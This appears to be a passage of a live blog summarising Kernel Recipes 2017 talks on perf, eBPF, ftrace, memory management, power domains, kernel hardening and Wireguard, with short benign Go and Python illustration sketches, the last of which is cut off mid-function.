This is useful at Netflix, because they scale the number of instances based on the percentage of CPU usage. At Netflix scale, a small performance improvement might lead to a scale-down saving the company a lot of money. While perf can do many things, Netflix uses it to profile CPU usage 95% of the time.

perf basics

perf originated from implementation of CPU Performance Monitoring Counters (PMCs) in Linux, and supports many features.

The main workflow is to run perf list to look at the available tracepoint events, then perf stat to count particular events. perf record captures the events and dumps them to the file system; perf report or perf script is then used to analyze the dumped perf data. perf top can be used to look at events in real-time.

Brendan maintains a list of perf one-liners, useful to explore and learn about perf capabilities.

Brendan came up with Flame Graphs when he was profiling a MySQL issue. It's a perl script that converts input data to svg. To use it with perf, use stackcollapse-perf.pl with perf script, and feed the output into flamegraph.pl

Gotchas

An important thing is to have working stack traces and symbol resolution. To fix stack traces you should use either frame-pointer based stack walking, libunwind or DWARF. You probably want -fno-omit-frame-pointer in your gcc options for C code. For Java, you might want to use perf-map-agent to do symbol resolution and de-inlining.

When you go to instruction-level, the problem is that resolution isn't really precise, so you don't really know which one you're executing. This is because of modern out-of-order CPU architecture. Intel's PEBS helps with this issue.

When using VMs, you might want to have your hypervisor (Xen, etc.) enable PMCs for your OS and handle this properly. For containers, perf might have issues finding the symbol files, since they are in a different namespace; this is fixed in 4.14.

In conclusion, there's a lot to say about perf, and this talk only scratched the surface of what's possible; Brendan pointed us to the many resources available about it online.

The Serial Device Bus

by Johan Hovold

While serial buses are ubiquitous, the TTY layer failed at modeling the resources associated with a serial line.

The TTY layer exposes a character device to userspace. It supports line discipline for switch modes, handling errors, etc.

It's possible to write drivers on top in userspace, and Johan used gpsd as an example of this. But you need to know the associated port in advance, and resources aren't necessarily accessible. And you lose the ability to interact with other subsystems in the kernel. Another example of this is bluetooth, where you register further devices (hci0) in order to be able to control the line-discipline and properly initialize ports.

To initialize the bluetooth, you use hciattach to configure a tty as bluetooth device, then the hci device appears, and then you use hciconfig to manage this device. The problem with this type of ldisc drivers is that you lose control over some information to userspace, and you don't have the full picture for GPIOs, and other resources for handling power management for example.

Serial Device Bus

serdev was originally written by Rob Herring; it was created as a bus for UART-attached devices. It was merged in 4.11, but only enabled in 4.12 following some issues.

The new bus name is "serial"; it refers to serdev controllers and clients (or slaves). The only controller available is the TTY-port controller. The hardware description happens in the Device Tree.

serdev allows a new architecture, with simpler interaction and layering, without the need to have userspace change the mode of a TTY first, since all the necessary data is in the Device Tree. For bluetooth, this would mean hci0 would appear at dt probe time, making it possible to use hciconfig directly.

There are currently three bluetooth drivers using this infrastructure in the kernel, as well as one ethernet driver (qca_uart).

The main limitation is that it's serial-core only. It currently only supports Device Tree, but ACPI support is being worked on. Hotplug support isn't solved either. Patches for multiplexing, to support multiple slaves, have been posted.

eBPF and XDP seen from the eyes of a meerkat

by Éric Leblond

Suricata is an open-source Intrusion Detection System that relies on kernel features. It starts with dumping all packets at the IP level with linux raw sockets, then does stream reconstruction and application protocol analysis. It works at 10GB/s in normal use in enterprise networks. It analyses the data, and outputs JSON, or even a web dashboard.

Suricata uses linux raw sockets with AF_PACKET in memory-mapped fan-out mode for multi-threaded processing.

One issue Suricata encountered was the asymmetrical hash being changed in Linux 4.2, breaking ordering so that Suricata couldn't properly analyze the streams. This was fixed later in 4.6.

eBPF

eBPF came to the rescue by enabling Suricata to customize the hash function, and then properly tag packets so that they go to the proper thread (load-balanced), hence preserving ordering.
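To illustrate why a symmetric hash preserves ordering, here is a userspace sketch in Go. It is not Suricata's eBPF code: the endpoint type, the FNV hash and the flowThread name are all assumptions made for this example. The point is only that both directions of a flow must land on the same thread.

```go
package main

import (
	"fmt"
	"hash/fnv"
)

// endpoint is one side of an IPv4 flow.
type endpoint struct {
	ip   [4]byte
	port uint16
}

// less gives an arbitrary but stable ordering of endpoints.
func less(a, b endpoint) bool {
	for i := range a.ip {
		if a.ip[i] != b.ip[i] {
			return a.ip[i] < b.ip[i]
		}
	}
	return a.port < b.port
}

// flowThread picks a thread for a packet. The endpoints are sorted before
// hashing, so swapping source and destination gives the same result.
// threads must be greater than zero.
func flowThread(src, dst endpoint, threads uint32) uint32 {
	if less(dst, src) {
		src, dst = dst, src
	}
	h := fnv.New32a()
	for _, e := range []endpoint{src, dst} {
		h.Write(e.ip[:])
		h.Write([]byte{byte(e.port >> 8), byte(e.port)})
	}
	return h.Sum32() % threads
}

func main() {
	client := endpoint{ip: [4]byte{10, 0, 0, 1}, port: 40000}
	server := endpoint{ip: [4]byte{192, 168, 1, 2}, port: 443}
	fmt.Println(flowThread(client, server, 8) == flowThread(server, client, 8))
}
```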

Another issue related to load-balancing, is the big flow handling, that is hard to handle without losing packets or ordering. One solution is to discard select packets, by bypassing certain packets as soon as possible in the kernel to reduce performance impact.

Suricata implemented a new "stream depth" bypass that allows discarding to start after the flow has started, while still capturing the most interesting part at the beginning.

For the kernel part of this bypass implementation, nftables did not work because it was too late in the process, after AF_PACKET handling. An eBPF filter using maps helped Suricata achieve this.

bcc didn't match Suricata requirements, so they used libbpf which is hosted inside the kernel in tools/lib/bpf. Eric says it's easy enough to use.

XDP

The eXpress Data Path (XDP) project was started to give access to raw packet data from the network card, before it reaches the Linux network subsystem and an skb is created. You can even interact with it using an eBPF filter. This needs modified drivers, and many are already supported; in 4.12 there's even a generic driver usable for development, but less performant.

Eric started integrating XDP in Suricata, and found that it meant doing more parsing since it was raw packets. libbpf support isn't done yet either. To hand over the capture to userspace, the strategy is to use the perf event system, with its memory mapped ring buffer.

This is still a bit fresh, Eric says, but promising and very efficient.

HDMI CEC Status Report

by Hans Verkuil

The Voyager space probe sent in 1977 communicates at 1477 bits per second, and CEC is a bus that communicates at 400 bits per second, making Hans the maintainer of the slowest bus in the kernel.

CEC is an optional part of HDMI that provides high level functions and communications for Audio and Video products. It's a 1-line protocol. It has physical addresses, the TV always being 0, and inputs have others. Then there are logical addresses from 0 to 15.

Features

CEC allows waking up or shutting down a device (TV or other), switching sources, and getting remote passthrough. You can also tell other devices the name of your device. You can also configure the Audio Return Channel (ARC) to send the audio from the sink (TV) to a device through the HDMI Ethernet pins.

Inside the kernel, the CEC framework implements most of the features. The drivers only need to implement the low-level CEC adapter operations. It handles core messages automatically, but you can also get them if you enable passthrough. If you need to assemble or decode CEC messages, there's a BSD and GPL-licensed header-only implementation in cec-funcs.h that can be used by applications. The framework driver API is pretty compact and simple to implement.

The userspace API has various messages to set a physical or logical address, set the mode of the fd, etc.

The Hotplug Detect use case is complex, since it depends on the status of the HDMI Hotplug Detect pin (HPD). If the pin is down, some devices won't be able to send CEC messages. Some TVs turn off HPD, but still receive CEC messages. Hans says that the most reliable way to wake up a TV is to just send a message, regardless of the HPD status. It's out-of-spec, but is the only way to make it work.

cec-ctl is the tool that implements the userspace API and allows interacting with the framework from the command line.

In kernel 4.14, many devices are now supported, including the Raspberry Pi. It can now be emulated with the vivid driver. It passed CEC 1.4 and 2.0 compliance tests. This makes Linux the only OS with built-in CEC support, Hans says.

In the pipeline is support for many new devices, as well as a brand new cec-gpio driver allowing bit-banging of CEC over a GPIO. It also allows injecting errors, but this should come later.

20 years of Linux Virtual Memory

by Andrea Arcangeli

Virtual Memory (VM) is practically unlimited and costs virtually nothing; virtual pages point to physical pages, which are the real memory.

In x86, the pagetable format is a radix tree. With the traditional 4 levels of page tables you can address 256TiB of memory; with 5-level page tables, you can address 128PiB of memory, but it has a performance impact.
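The 256TiB and 128PiB figures follow from the x86-64 page table geometry: 4KiB pages give 12 offset bits, and each level of 512-entry tables adds 9 bits. A quick sketch of that arithmetic (the addressBits helper is made up for this example):

```go
package main

import "fmt"

// addressBits returns the virtual address width for a given number of
// page-table levels, with 4 KiB pages (12 offset bits) and 512-entry
// tables (9 bits per level), as on x86-64.
func addressBits(levels int) int {
	return 12 + 9*levels
}

func main() {
	for _, levels := range []int{4, 5} {
		bits := addressBits(levels)
		tib := uint64(1) << (bits - 40) // 1 TiB is 2^40 bytes
		fmt.Printf("%d levels: %d bits, %d TiB\n", levels, bits, tib)
	}
}
```

This prints 48 bits and 256 TiB for four levels, and 57 bits and 131072 TiB (128 PiB) for five.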

The VM algorithms in Linux use heuristics to solve a hard problem of using the memory as best as possible. One such choice is to have overcommit by default. Or to use all free memory as cache.

In the VM, the basic structure is struct page. It's currently 64 bytes, and is using 1.56% of all memory in a given system.
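The 1.56% figure is simply the ratio between the size of struct page and the 4KiB page it describes. A small sketch, where the 16GiB machine is only a hypothetical example:

```go
package main

import "fmt"

// overheadPercent returns the share of memory used by per-page metadata,
// given the metadata size and the page size in bytes.
func overheadPercent(structSize, pageSize int) float64 {
	return 100 * float64(structSize) / float64(pageSize)
}

func main() {
	const structPage, pageSize = 64, 4096
	fmt.Printf("overhead: %.4f%%\n", overheadPercent(structPage, pageSize))

	const ram = 16 << 30 // hypothetical 16 GiB machine
	fmt.Printf("struct page total for 16 GiB: %d MiB\n", ram/pageSize*structPage>>20)
}
```

So on such a machine, 256 MiB would go to struct page alone.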

MM is the memory of a process, and is shared by threads. The virtual memory areas (VMAs) live inside the MM. The LRU cache is a combination of two lists of recently used pages, and uses an active and inactive optimum balancing algorithm. The status of those lists is visible in /proc/meminfo.

Reverse mapping of the objects (objrmap) is used as well to find reverse references of pages to processes.

There are other LRUs for anonymous and file-based mappings, or cgroups.

Trends

Automatic NUMA Balancing helps running various workloads, without having to adapt it to NUMA mode with hard bindings.

Transparent Hugepages are a way to automatically use huge pages if an application uses lots of memory, instead of manually with hugetlbfs.

The MMU notifier allows reducing page pinning, making it possible to swap-out DMAed memory with proper driver interactions.

HMM or Unified Virtual Memory allows going even further for GPU and seamless computing, without requiring cache-coherency.

Andrea showed auto-NUMA balancing benchmarks, and it improves transactions as much as 10%. A remark from the audience showed that in some pathological cases, the performance might actually be worse, but the feature can be disabled.

Huge Pages

With hugepages, you can go from 4KiB pages to 2MiB pages. This allows completely removing a pagetable level, and thus improving performance in some cases. But it has a cost when clearing pages, making it less cache friendly. For the latter, a huge improvement in performance was seen when clearing the faulting sub-page last, so that it's still in the cache.

Transparent Hugepage (THP) works by simply sending 2M pages when the mmap region is 2M aligned, and the request is big enough. It is tunable in /sys/kernel/mm/transparent_hugepage; it can be disabled, enabled only for madvise, or always. The THP defragmentation/compaction is also tunable.
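The sysfs files in that directory list all possible values, with the active one between brackets (for example "always [madvise] never"). A minimal sketch to read the current settings; the selected helper is made up for this example, and the program only makes sense on a Linux machine with THP support:

```go
package main

import (
	"fmt"
	"os"
	"strings"
)

// selected returns the bracketed word in a sysfs multiple-choice value
// such as "always [madvise] never", or "" if there is none.
func selected(s string) string {
	for _, f := range strings.Fields(s) {
		if strings.HasPrefix(f, "[") && strings.HasSuffix(f, "]") {
			return strings.Trim(f, "[]")
		}
	}
	return ""
}

func main() {
	const dir = "/sys/kernel/mm/transparent_hugepage"
	for _, name := range []string{"enabled", "defrag"} {
		data, err := os.ReadFile(dir + "/" + name)
		if err != nil {
			fmt.Println(name, "unavailable:", err)
			continue
		}
		fmt.Printf("%s: %s\n", name, selected(string(data)))
	}
}
```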

Since Linux 4.8, it's possible to use THP with tmpfs and shmem. This is also tunable and disabled by default.

KSM and userfaultfd

Virtual memory deduplication (KSM) is practically unlimited, affecting migration during compaction for example; with KSMscale, a maximum limit is set on per-physical-page dedup, the default is 256, so that a given KSM page would only be referenced by at most 256 virtual pages; this is tunable. Answering a question from the audience, Andrea said that if you care about cross-VM sidechannel attacks, you should probably disable KSM after disabling HyperThreading.

userfaultfd allows userspace more visibility and control over page-faulting. It enables postcopy live migration with VMs (efficient snapshotting). It can be used to drop write bits for JITs, and has many other uses.

Andrea concluded that he is amazed with the room for innovation to continue further improvements, after 20 years of working with the Linux memory management.

An introduction to the Linux DRM subsystem

by Maxime Ripard

Presentation slides

In the beginning, there was the framebuffer. That's how fbdev was born, to do very basic graphics handling. Then, GPUs came along, getting bigger and bigger. In parallel in the embedded space, piles of hacks were accumulated in display engines to accelerate some operations.

At first, DRM was only for GPUs' needs, without any kind of modesetting. It required mapping device registers to userspace, which would do the modesetting itself. But since Kernel Mode-Setting (KMS), this has moved back into the kernel.

fbdev is now obsolete, and dozens of ARM drm drivers have been merged since 2011.

Traditionally in embedded devices, there were two completely different devices for the GPU and the display engine. In Linux, there's the divide between DRM and KMS.

KMS has planes, that can be used for double-buffering. It also has the CRTC, that does the composition. Encoders take the raw data from the CRTC, and convert it to a useful hardware bus format (HDMI, VGA). Connectors output the data, handle hotplug events and EDIDs.

In the DRM stack, GEM can be used to allocate and share buffers without copy with the kernel. PRIME can interact with GEM and dma-buf to also handle buffers shared with hardware.

Vendors also have their own solutions, like ARM's Mali proprietary driver. Blob access for userspace is tightly controlled.

Build farm again

by Willy Tarreau

This is a followup of last year's presentation. The old build farm had shortcomings: it wasn't reliable (HDMI sticks), had a bad power supply, and heating issues. Yet the RK3288 was quite powerful, so Willy wanted to try again with the same CPU.

He got 10 MiQi boards, which are even faster thanks to dual-channel DDR3, although still having shortcomings when combining them with foam. Willy fixed the heatsink, by using a 3M thermal tape. Instead of microUSB, Willy simply soldered thicker cables directly on the board. And to solve the switch attrition issue, he tried a Clearfog-A1 board.

distcc was updated to the latest version for more flexibility, and its settings were bumped in order to saturate all the cores on all CPUs. LZO compression helped reduce upload time. He also found that there was a hardcoded limit of 50 parallel jobs in distcc, and fixed it.

He improved the distcc distribution using haproxy in front with the leastconn algorithm, this helped a lot.

Using the cluster in addition to his local beefy machine, he went from 13 minutes for kernel builds to 4m45s.

To help with monitoring, Willy submitted a new led-activity LED trigger for the kernel to change the blinking speed depending on CPU usage.

To build haproxy, he went from 11s to 3s with the added farm. With up to 200 builds a day, it saves a little under half an hour per day.

Feedback was sent to MiQi's maker; patches to distcc. The quest for a good USB power supply continues. Willy is now exploring alternative boards for even faster builds.

(That's it for Kernel Recipes 2017! See you next year!)

Kernel Recipes 2017 day 2 notes

2017-09-28T00:00:00+02:00

This is a continuation of yesterday's live blog of Kernel Recipes 2017.

Linux Kernel Self Protection Project

by Kees Cook

Presentation slides

The aim of the project is more than protecting the kernel.

Background

Kees' motivation for working on Linux is the two billion Android devices running Linux. The majority of those are running a 3.4 kernel.

CVE lifetimes — the time between bug introduction and fix — are pretty long, averaging many years.

Kees says the kernel team is fighting bugs, they are finding them, but just doing that isn't enough. The analogy Kees gave was that the Linux security is in the same place the car industry was in the 60s, where most work done was on making sure the car worked, but not necessarily that they were safe.

Killing bug classes is better than simply fixing bugs. There's some truth in the upstream philosophy that all bugs might be security bugs. Shutting down exploitation targets and methods is more valuable in the long term, even if it has a development cost.

Modern exploit chains are built on a series of bugs, and just breaking the chain at one point is enough to stop or delay exploitation.

There are many out-of-tree defenses that have existed over the years: PaX/grsec, or many articles presenting novel methods that were never merged upstream. Being out-of-tree is not anything special, since the development mode in Linux is to fork. Distros integrate custom mitigations, like RedHat's ExecShield, Ubuntu's AppArmor, grsecurity or Samsung's Knox for Android.

But in the end, upstreaming is the way to go, Kees says. It protects more people, reduces maintenance cost, allowing to focus on new work instead of playing catch-up.

Many defenses are powerful because they're not the default, and aren't widely examined. Kees gave an example of custom email server configurations that were very effective at fighting spam because they're not the default; otherwise the spammers would adapt.

Kees then showed another example with grsecurity, where the stack clash protection was not upstreamed, not reviewed, and was in the end weaker than the solution finally merged upstream.

Kernel self protection project

In 2015, Kees announced this project because he realized he wouldn't be able to do all the upstreaming work by himself. It is now an industry-wide project, with many contributors.

There are various types of protections: probabilistic protections reduce the probability of success of an exploit. Deterministic protections completely block an exploitation mechanism.

Stack overflow and exhaustion is an example of a bug class that was closed down upstream with vmap stack. Kees is still porting a PaX and grsecurity gcc plugin to work on that. The stack canary is essential as well, Kees said. For instance, it mitigates the latest BlueBorne vulnerability.

Integer over/underflow protection went inside the kernel with the new refcount patches. Buffer overflows are mitigated upstream through Hardened user copy or recent FORTIFY_SOURCE integration. Format string injection was mitigated in 3.13 when the %n format option was completely removed.

Kernel pointer leak isn't entirely plugged, despite various fixes. Uninitialized variable was mitigated through porting of the structleak PaX gcc plugin. Kees says it's more than an infoleak, and this might be exploited in some cases.

Use-after-free was mitigated with page zero poisoning in Linux 4.6, and freelist randomization in 4.7 and 4.8.

Exploitation

The first step of an exploit is to find the kernel in memory (e.g. through kernel pointer leaks). To mitigate this, there are various types of kASLR, or the ported grsecurity randstruct plugin.

A very basic protection is to make sure executable memory cannot be writable, and this was merged for various architectures a long time ago.

Function pointer overwrite is a very standard exploitation method, and this was mitigated by the pax constify plugin, and then the ro_after_init annotation in the kernel.

Mitigating userspace execution is still a work in progress on x86, but arm64 already has fixes for that.

The next stages are mitigating user data reuse, and reused code chunks (ROP), PaX has a RAP closed-source technology to do this.

Understanding the Linux Kernel via ftrace

by Steven Rostedt

Steven started by saying that this talk is really fast, and you should watch it three times to understand it.

Ftrace is an infrastructure with several features. Ftrace is the exact opposite of security hardening: it gives visibility in the kernel, provides instrumentation to do live-kernel patching, and of course rootkits.

Ftrace is already in the kernel. It was initially used through debugfs, but it now has its own filesystem, tracefs, mountable in /sys/kernel/tracing. All files and even documentation are in there, so it's usable through echo and cat, because Steve wanted busybox to be enough to control these features. This is where the files described in the rest of the talk live.

The basic file is trace, showing the raw data. Then there's available_tracers. The default tracer is the nop one, which does nothing. The most interesting one is the function tracer, that shows every called function in the kernel. The most beautiful one, according to Steve is the function_graph tracer that follows the call graph.

The tracing_on file controls writes to the ring buffer. When it is turned off, the tracing infrastructure is still there, but the ring buffer isn't filled with data. It's meant for temporary pauses of tracing.
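Since everything is driven by echo and cat, the same sequence is easy to script. Below is a minimal sketch in Python; the helper names are mine, and `current_tracer` (the file used to select one of the `available_tracers`) is not named in my notes above but is the standard tracefs file for this. Writing to the real tracefs requires root.

```python
from pathlib import Path

TRACEFS = Path("/sys/kernel/tracing")  # mount point mentioned in the talk


def write_control(name, value, root=TRACEFS):
    """Equivalent of `echo value > root/name`."""
    (Path(root) / name).write_text(f"{value}\n")


def read_control(name, root=TRACEFS):
    """Equivalent of `cat root/name`."""
    return (Path(root) / name).read_text()


def trace_briefly(tracer="function", root=TRACEFS):
    """Select a tracer, let it run, pause the ring buffer, return the trace."""
    write_control("current_tracer", tracer, root)
    write_control("tracing_on", 1, root)
    # ... the workload of interest would run here ...
    write_control("tracing_on", 0, root)   # pause writes, keep the buffer
    output = read_control("trace", root)
    write_control("current_tracer", "nop", root)
    return output
```

The `root` parameter is only there so the helpers can be tried against a scratch directory before pointing them at a live kernel.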

There are a few files that allow limiting ftrace to filter the output: set_ftrace_filter for example matches the function names, and supports glob matching, appending, or clearing.

The file available_filter_functions shows the available functions; it does not include all kernel functions, depending on gcc instrumentation: inline functions and annotated non-traceable functions (timers, ftrace itself, boot time code) are left out.
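Before writing a glob to set_ftrace_filter, it can be handy to preview what it would select from available_filter_functions. The sketch below approximates the kernel's glob matching with Python's `fnmatch`, which is an assumption on my side: the two matchers are not guaranteed to agree on every pattern. The function list is a made-up excerpt.

```python
from fnmatch import fnmatchcase


def preview_filter(available, patterns):
    """Return the functions from `available` matched by any glob pattern."""
    return [f for f in available if any(fnmatchcase(f, p) for p in patterns)]


# Hypothetical excerpt of available_filter_functions
available = ["SyS_read", "SyS_write", "vfs_read", "vfs_write", "schedule"]

read_side = preview_filter(available, ["*_read"])
syscalls_and_sched = preview_filter(available, ["SyS_*", "schedule"])
```

Passing several patterns mirrors appending to the filter file (`>>`) rather than overwriting it (`>`).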

When using the function tracer, it shows the function calls as well as the parent.

The filter file set_ftrace_pid limits tracing to functions executed by a given task. If you have multiple threads, it's the thread id.

To trace syscalls, you need to know that the definition macros add a sys_ prefix to the syscall names. If you want to trace the read syscall, you should trace the SyS_read function, because the upper case function comes first. You can find it in the available_filter_functions file.

The set_graph_function filter helps when you want to trace starting from a given point, and follow the call graph, across function pointer boundaries, giving you insight that's harder to get with just the code. Steven gave an example with the sys_read syscall, where you can know exactly which function is called, even when you have the file_operations structure making code reading harder, but the graph is very clear. You can combine this with set_ftrace_notrace to set a boundary of functions or set_graph_notrace for call graphs you're not interested in, to ease reading the call graph and reduce the ftrace performance impact.
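The call-graph setup described here boils down to a short, ordered list of writes. The sketch below builds that list and applies it; the helper names are mine, `mutex_lock` is just a hypothetical function to exclude, and `current_tracer` is the standard tracefs file for selecting the tracer. Each excluded function is appended separately, like `echo func >> file`.

```python
from pathlib import Path


def graph_trace_steps(entry, skip=()):
    """Ordered (file, value, mode) writes to graph-trace starting at `entry`."""
    steps = [("set_graph_function", entry, "w")]
    for func in skip:
        # "a" mimics `echo func >> set_graph_notrace`
        steps.append(("set_graph_notrace", func, "a"))
    steps.append(("current_tracer", "function_graph", "w"))
    steps.append(("tracing_on", "1", "w"))
    return steps


def apply_steps(steps, root="/sys/kernel/tracing"):
    """Perform the writes; needs root when pointed at the real tracefs."""
    for name, value, mode in steps:
        with open(Path(root) / name, mode) as f:
            f.write(value + "\n")


steps = graph_trace_steps("SyS_read", skip=["mutex_lock"])
```

Setting the filters before switching tracer matters: enabling function_graph with no filter traces everything, which is exactly the overhead the filters are there to avoid.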

There are many options in the options directory or the trace_options file. Steven likes the func_stack_trace option: it creates a stack trace of traced functions. Be careful, if you don't set a filter, it's going to bring your machine to its knees. Also remember to turn it off when done. sym_offset or sym_addr options show the function relative and absolute locations in memory.

When you set a filter starting with :mod:module_name, it will trace all the functions in a given module.

Function triggers are useful when you want to start tracing, stop tracing, or even add a stacktrace when a function is hit. For example, you can set a filter with function_name:stacktrace, and it will give you a stacktrace every time this particular function is called.

When interrupted, you might not want to see the interrupt function graph: there's a default-on option funcgraph-irqs that does just that if you turn it off.

It's possible to limit the graph depth of the function_graph tracers with the max_graph_depth option.

You can also trace with events. The events are listed by subsystems in the events directory. The most commonly used ones are sched, irq or timer families of events. You enable events separately of the specific tracers. If you only want events, use the nop tracer, but this can be combined with the others.

There are two useful options to control event and function tracing: event-fork and function-fork allow to continue tracing children of a traced process.

Finally, Steve introduced the trace-cmd program, that wraps all the custom echos and cats in a single program. trace-cmd has nice tricks to make sure you only stack-trace a single function, and can do all you can do without it with a simpler interface.

Introduction to Generic PM domains

by Kevin Hilman

Two years ago, Kevin did an introduction on various power management subsystems at Kernel Recipes. This talk focuses on PM domains.

The driver model starts with the struct dev_pm_ops. You control the global system suspend through /sys/power/state, and this then calls the appropriate driver callbacks. It's very powerful, but also fragile since any driver failing will stop the whole chain. This is static power management or system-wide suspend.

The focus of this talk is the Dynamic power management, in particular for devices.

Dynamic power management

It starts with runtime PM, a per-device idle mode, one device at a time. It's handled by the driver, based on activity. In this mode, devices are independent, and one device cannot affect other drivers. When using powertop, the "device stats" tell you how long your device is idle.

The runtime PM core keeps a usage count for driver uses. When the count hits 0, the core calls runtime_suspend on a device. If you have a device on a bus_type, it sits between you and the runtime PM core. In driver callbacks, one can ensure context is saved, and the wakeups are enabled, restore context on resume, etc.
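The usage-count logic can be modelled in a few lines. This is a toy sketch of the idea, not the kernel API: the `get`/`put` method names and the `log` list are hypothetical, and the real core also deals with things like delayed suspend and bus-level callbacks.

```python
class RuntimePMDevice:
    """Toy model of a runtime-PM usage counter for one device."""

    def __init__(self, name):
        self.name = name
        self.usage_count = 0
        self.suspended = True   # idle until someone uses the device
        self.log = []

    def get(self):
        """Take a reference; resume the device on the 0 -> 1 transition."""
        if self.usage_count == 0 and self.suspended:
            self.log.append("runtime_resume")   # context would be restored here
            self.suspended = False
        self.usage_count += 1

    def put(self):
        """Drop a reference; suspend the device when the count hits 0."""
        if self.usage_count == 0:
            raise RuntimeError("unbalanced put()")
        self.usage_count -= 1
        if self.usage_count == 0:
            self.log.append("runtime_suspend")  # save context, arm wakeups
            self.suspended = True
```

Two users taking a reference only resume the device once, and it is suspended again only when the last one lets go.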

PM domains map the architecture of power domains inside modern SoCs, where various hardware blocks are grouped in domains that can be turned on and off independently, to the Linux kernel.

PM domains are similar to bus types in the kernel, but orthogonal since some devices might be in the same domain but different buses.

genpd

Generic PM domains (genpd) are the reference implementation of PM domains, to be able to do the grouping and actions when a device becomes idle or active.

In order to implement a genpd, you first implement the power_on/power_off function. It's typically messaging a power domain controller on a separate core, but might be related to clock management or voltage regulators. This is then described in a Device Tree node, allowing to reorder domains for different chip revisions.

Power domains have a notion of governors, allowing custom decision making before cutting power. It allows flexibility relative to the ramp up/down delays for example. It is usually implemented in the genpd, but there are two built-in governors like Always-on or Simple QoS governors. You can attach runtime system-wide or per-device QoS constraints to control the governors.
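Putting the pieces together, a domain can be pictured as a group of devices plus a governor that gets the last word before power is cut. The following is a simplified model of my own, with hypothetical class and method names; it only illustrates the grouping and the governor hook.

```python
class PowerDomain:
    """Toy power domain: powers off when every device is idle and the governor agrees."""

    def __init__(self, name, governor=None):
        self.name = name
        self.active = set()      # names of devices currently in use
        self.powered = False
        # governor: callable returning True when power may be cut
        self.governor = governor or (lambda domain: True)
        self.log = []

    def device_active(self, dev):
        if not self.powered:
            self.log.append("power_on")
            self.powered = True
        self.active.add(dev)

    def device_idle(self, dev):
        self.active.discard(dev)
        if not self.active and self.powered and self.governor(self):
            self.log.append("power_off")
            self.powered = False


def always_on(domain):
    """Governor that never allows the domain to be powered off."""
    return False
```

A QoS-style governor would instead compare the domain's power-down and power-up latency against the constraints attached to its devices.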

There has been a lot of work recently upstream, like IRQ-safe domains, or always-on domains. Statistics and debug instrumentations were also added recently.

Under discussion is a way to unify CPU and devices power domain management. Upstream is also interested in having a better interaction between static and runtime PM. Support for more complex domains, in order to have the same driver for an IP block whether it's used through ACPI or genpds, is still in the works.

Performance Analysis Superpowers with Linux BPF

by Brendan Gregg

Presentation slides

Boldly starting the presentation with a demo, Brendan showed how to analyze how top works, with funccount and funcslower, kprobe, funcgraph and other ftrace-based tools he wrote.

He then switched to an eBPF frontend called trace, that was used to dig into the arguments of a kernel function. You can leverage eBPF even more with other tools like execsnoop or ext4dist.

eBPF and bcc

BPF comes from network filtering, originally used with tcpdump. It's a virtual machine in the kernel.

BPF sources can be tracepoints, kprobes, or uprobes. It uses the perf event ring buffer for efficiency. You can use maps as an associative array inside the kernel. The general tracing philosophy is to have a very precise filter to only get the data you need, instead of dumping all the data in userspace, and filtering it later.
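The "filter early, aggregate in a map" philosophy can be illustrated without any BPF at all. The sketch below is plain Python standing in for what a BPF program and its map would do in the kernel; the `(pid, latency_us)` event tuples are hypothetical.

```python
from collections import Counter


def log2_bucket(value):
    """Index of the power-of-two bucket holding value (0 for values below 2)."""
    return max(value, 1).bit_length() - 1


def aggregate(events, wanted_pid):
    """Filter early, then keep only a small histogram, as a BPF map would."""
    hist = Counter()
    for pid, latency_us in events:
        if pid != wanted_pid:   # precise filter: drop everything else
            continue
        hist[log2_bucket(latency_us)] += 1
    return dict(hist)
```

However many events fire, only a handful of bucket counters ever need to cross over to userspace.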

Many features were added recently to eBPF, and it keeps being improved.

BPF Compiler Collection (BCC) is the most used BPF frontend. It allows you to write BPF programs in C instead of assembly, and load the programs. You can then combine this with a python userspace.

bpftrace is a new in-development frontend, with a simple-to-use philosophy.

Installing bcc on your distro is becoming easier as it gets packaged. There are many tools, each with a different use giving visibility into a different kernel part.

Heatmaps are very useful to visualize event distribution. Flamegraphs are also very powerful when combined with kernel stacktraces generation. It's now even possible to merge userspace and kernelspace stacktraces for analysis.

Future work

Support for higher level languages to write BPF programs like ply or bpftrace is in progress.

In conclusion, eBPF is very useful to understand Linux internals, and you should use it.

Kernel ABI Specification

by Sasha Levin

What's an ABI ? ioctls, syscalls, and the vDSO are examples of the Linux ABI.

Sasha repeated the ABI promise from Greg's talk yesterday. The issue, he says, is that kernel lacks tools to detect a broken ABI.

Sometimes basic syscall argument checks are forgotten, and discovered as a security vulnerability. Sometimes, some interfaces have undefined behaviour, making the ABI stability uncertain.

Breakage is sometimes difficult to fix when detected late, because new userspace might depend on the new behaviour.

In the end, some userspace programs like glibc, strace, or syzkaller might rewrite their understanding of the kernel ABI, and those might be out of sync. Man pages might not document everything either, and they're not a real documentation of the ABI Contract.

ABI Contract

Right now it's in the form of kernel code. Unfortunately, code evolves, so it's not an optimal format for this.

The goal is to fix many issues at the same time: ensure backwards compatibility, prevent kernel to userspace errors, document the contract, and encourage re-use. Sasha looked for a format that would only require writing this once, and be machine readable. syzkaller's description looked like a good starting point. He wanted this to be reusable by userspace tools that need this information. And finally, he wanted to use this as a tool to help ABI fixes and fast breakage detection.

It also helps re-assuring the distribution that the ABI promise is really kept. In Sasha's view, it would also greatly help the security aspect of things, since the ABI is the main interface by which the kernel is attacked.

The hard part is to determine the format of this contract, document all syscalls and ioctls and write the tools to test it out.

Sasha already started with a few system calls, and is currently looking for help to get the ball rolling.

Lightning Wireguard talk

by Jason A. Donenfeld

Jason's background is in breaking VPNs. He wanted to create one that was more secure. That's how Wireguard was born.

Wireguard is UDP based, and uses modern cryptographic principles. The goal is to make it simple and auditable. To prove his point, he showed that it clocks at 3900 lines of code, while OpenVPN, Strongswan or SoftEther have between 116730 and 405894 lines of code each.

It uses normal interfaces, added through the standard ip tool. Jason says it's blasphemous because it breaks through the layering assumptions barriers, as opposed to IPsec for example.

A given interface has a 1 to N mapping between Public keys and IP addresses representing the peers. To configure the cryptokey routing, you use the wg tool for now. Once Wireguard is merged, the intention is to have this merged into the iproute project.
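Here is a rough sketch of what such a key-to-addresses table could look like. It is my own model, not Wireguard code: the class, the placeholder key strings, the longest-prefix lookup and the source check on receive reflect my understanding of the design rather than anything shown in the talk.

```python
import ipaddress


class CryptokeyRouter:
    """Toy table mapping peer public keys to the IP ranges they may use."""

    def __init__(self):
        self.routes = []   # list of (network, public_key)

    def add_peer(self, public_key, allowed_ips):
        for cidr in allowed_ips:
            self.routes.append((ipaddress.ip_network(cidr), public_key))

    def peer_for(self, address):
        """Longest-prefix match: which peer's key encrypts packets to address?"""
        addr = ipaddress.ip_address(address)
        matches = [(net.prefixlen, key) for net, key in self.routes
                   if addr.version == net.version and addr in net]
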